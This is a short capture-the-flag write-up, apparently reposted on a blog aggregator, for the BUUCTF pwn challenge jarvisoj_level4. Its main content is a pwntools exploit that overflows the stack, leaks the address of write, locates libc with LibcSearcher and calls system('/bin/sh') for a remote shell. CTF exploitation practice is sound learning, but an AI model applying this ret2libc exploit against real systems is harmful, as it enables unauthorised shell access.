[BUUCTF-pwn]——jarvisoj_level4

點我看 write up

exploit

from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26929)elf = ELF("./level4") write_plt = elf.plt['write'] write_got = elf.got['write'] main_addr = elf.sym['main'] payload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)p.send(payload) write_addr = u32(p.recv(4)) print hex(write_addr) libc = LibcSearcher("write", write_addr) libc_base = write_addr - libc.dump('write') sys_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh) p.sendline(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level4的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。